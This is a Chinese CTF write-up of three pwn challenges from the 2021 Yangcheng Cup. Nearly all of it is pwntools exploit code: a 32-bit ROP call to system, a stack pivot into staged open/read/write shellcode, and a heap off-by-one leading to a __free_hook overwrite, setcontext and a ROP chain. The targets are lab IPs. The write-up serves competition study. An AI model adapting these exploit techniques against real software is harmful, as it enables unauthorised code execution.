2021羊城杯pwn部分wp

前言:

羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了

BabyRop:

最基础的栈溢出rop链, 直接贴exp了:

from pwn import *

# All addresses below are hard-coded for this specific BabyRop binary
# (32-bit, p32 packing); they must be re-derived for any other build.
#p=process('./BabyRop')
p=remote('192.168.41.23', 11000)
context.log_level='debug'
sh=0x804c029       # presumably the address of a "sh" string in the binary (writeup does not say)
system=0x80490a0   # address system() is called through, per the writeup
#gdb.attach(p,'b *0x804926a')

# Layout per the writeup: 0x28 bytes of filler, 4 bytes over the saved ebp,
# then the classic 32-bit call frame [callee][fake return address][argument].
p.sendline('a'*0x28+'b'*4+p32(system)+p32(0)+p32(sh))
p.interactive()

nologin:

admin中存在溢出覆盖rbp和返回地址, 返回地址+8处, 在返回地址写上read函数+8处写call rsi即可迁移, 然后构造orw即可

from pwn import *
import sys   # NOTE(review): imported but never used in the visible script
context.log_level = "debug"
elf=ELF('./nologin')
#p=process('./nologin')
p=remote('192.168.41.23',40001)
context.binary=elf

# Short aliases for the tube's I/O helpers (rl, rv, sn, sa and sla are
# defined but unused in the visible script).
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a, b)

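def debugf(b=0):
    """Attach gdb to the target when a module-level ``debug`` flag is truthy.

    Args:
        b: optional breakpoint address; 0 (the default) attaches without one.

    The original body read a global ``debug`` that is never defined in this
    script, so every call raised NameError.  The lookup is now tolerant: a
    missing flag is treated as False and the helper becomes a no-op.
    """
    if not globals().get('debug', False):
        return
    if b:
        # "set follow-fork-mode parent" keeps gdb on the parent across fork().
        gdb.attach(p, "b *{b}\n".format(b=hex(b)) + "set follow-fork-mode parent\n")
    else:
        gdb.attach(p)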


# Menu option 2 ("admin") is where the writeup locates the overflow.
ru('input>>')
sl('2')
#debugf(0x40186b)
ru('>password: ')

# Fixed addresses for this nologin binary; re-derive for any other build.
rdi = 0x0000000000401173     # NOTE(review): assigned but never used below
sh = 0x000000000060204b      # NOTE(review): unused
system = 0x400E58            # NOTE(review): unused
buf = 0x0602060+0x100        # NOTE(review): unused; 0x602100 is repeated as a literal in the shellcode
call_rsi=0x000000000040186b
# Per the writeup: saved rbp and the return address are overwritten so that
# execution returns into read@plt and then into the "call rsi" gadget.
pay = p32(0x602101)+'\x00' +p64(0x602030+0x28)+ p64(elf.plt['read'])+p64(call_rsi)

# Stage 1 (writeup: "迁移"): a small stub that reads a second stage and
# jumps to it.  The asm text is a runtime string; do not reformat it.
shellcode=asm('''
              xor rax, rax;
              push r11;
              pop rdx;
              mov rsi, 0x602100;
              syscall;
              add rsi, 28;
              jmp rsi;
              ''')
sl(pay)
print hex(len(shellcode))   # Python 2 print statement: this script is Python 2 only
sl(shellcode)

# Stage 2: the open/read/write ("orw") chain the writeup describes.
shellcode1=asm('''
               xor rax, rax;
               mov rax, 2;
               sub rsi, 16;
               mov rdi, rsi;
               xor rsi, rsi;
               syscall;

               mov rdi, rax;
               xor rax, rax;
               mov rsi, 0x602300;
               mov rdx, 0x80;
               syscall;
               
               mov rax, 1;
               mov rdi, 1;
               syscall;
               ''')
# The filename is embedded in front of the code; the "sub rsi, 16" above
# presumably points back into it -- confirm against the stage-1 offsets.
sl('b'*11+'./flag\x00\x00'*3+shellcode1)
p.interactive()

Whats your name:

存在obo可以导致堆块重叠, 之后控制节点指针即可造成任意写, 后面泄露完libc用setcontext控制寄存器跳转到写好的orwshellcode上就行了

from pwn import *

#p=process('./name')
elf=ELF('./name')
p=remote('192.168.41.23',9999)
context.log_level='debug'
# The libc next to the binary; every libc-relative offset below assumes this exact build.
libc=ELF('./libc.so.6')
context.binary=elf

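def menu(id):
    """Wait for the menu prompt and select option ``id`` (1-5).

    Body re-indented to four spaces: the original mixed an 8-space line with
    a tab-indented line, which Python 3 rejects with TabError.  The parameter
    name ``id`` shadows the builtin but is kept for callers.
    """
    p.recvuntil('5.exit')
    p.sendline(str(id))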

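def add(size):
    """Menu option 1: allocate a name of ``size`` bytes.

    Body re-indented to four spaces: the original mixed tab and 8-space
    indentation, which Python 3 rejects with TabError.
    """
    menu(1)
    p.recvuntil('name size:\n')
    p.sendline(str(size))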

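def edit(id,name):
    """Menu option 2: overwrite entry ``id`` with ``name``.

    ``name`` goes through str(), so non-string payloads (e.g. a
    SigreturnFrame) are serialised by their __str__ -- Python 2 semantics.
    Body re-indented to four spaces: the original mixed tab and 8-space
    indentation, which Python 3 rejects with TabError.
    """
    menu(2)
    p.recvuntil('index:\n')
    p.sendline(str(id))
    p.recvuntil('name:\n')
    p.sendline(str(name))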

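def show(id):
    """Menu option 3: print entry ``id``; the caller reads the output.

    Body re-indented to four spaces: the original mixed tab and 8-space
    indentation, which Python 3 rejects with TabError.
    """
    menu(3)
    p.recvuntil('index:\n')
    p.sendline(str(id))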

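def delete(id):
    """Menu option 4: free entry ``id``.

    Body re-indented to four spaces: the original mixed tab and 8-space
    indentation, which Python 3 rejects with TabError.
    """
    menu(4)
    p.recvuntil('index:\n')
    p.sendline(str(id))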

# Leak: entry 0 is shown before being written, so its contents (per the
# writeup, libc pointers) come back in the output.
add(0xe8)
show(0)

# The two literals are a libc base / leaked-pointer pair captured from one
# run; their difference is the offset for *this* libc build only.
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))+0x7ff8c20fb000-0x7ff8c24bfb78
success('libc_base:'+hex(libc_base))

# Same trick for a heap pointer.
add(0x70)
show(1)
heap=u64(p.recv(6).ljust(8,'\x00'))
log.success('heap addr:'+hex(heap))
# Chunk shaping for the off-by-one / overlap the writeup describes; the
# 0x140 written at entry 3's end is presumably the neighbouring size field.
add(0xf0)
add(0x38)
add(0xf0)
add(0x30)
delete(2)
edit(3,'a'*0x30+p64(0x140))
delete(4)
add(0xf0)
add(0x60)
add(0x20)

# NOTE(review): `open` shadows the builtin open() for the rest of the script.
open=libc_base+libc.sym['open']
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
# Gadget offsets are libc-build specific, like the leak offset above.
ret=0x0000000000000937+libc_base
pop_rdi=0x0000000000021112+libc_base
pop_rsi=0x00000000000202f8+libc_base
pop_rdx=0x0000000000001b92+libc_base

# Heap-relative offsets captured from earlier runs; valid only for this layout.
flag_addr=heap+0x55737989b3e0-0x55737989b570
setcontext=libc_base+libc.sym["setcontext"]+53
rop=heap-0x561c6dee4570+0x0000561c6dee4d90
edit(1,'/flag\x00\x00')
# Writeup: the overlapped node pointer is redirected at __free_hook, which
# entry 6 then overwrites with setcontext.
edit(3,'aaaaaaaa'+p64(libc_base+libc.sym['__free_hook']))
edit(6,p64(setcontext))
add(0x100)#7
success("rop:"+hex(rop))
# The open/read/write chain; the 8-byte prefix in edit(7, ...) matches rsp=rop+8 below.
payload=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(rop+0x500)+p64(pop_rdx)+p64(0x40)+p64(read)
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(rop+0x500)+p64(pop_rdx)+p64(0x40)+p64(write)
edit(7,'a'*8+payload)

# SigreturnFrame is used here only as a register-file layout for setcontext.
frame = SigreturnFrame()
frame.rsp = rop+8
frame.rip = ret

# edit() calls str(frame), so this relies on Python 2 str/bytes semantics.
edit(0,frame)
delete(0)


p.interactive()


转载自blog.csdn.net/eeeeeight/article/details/120255533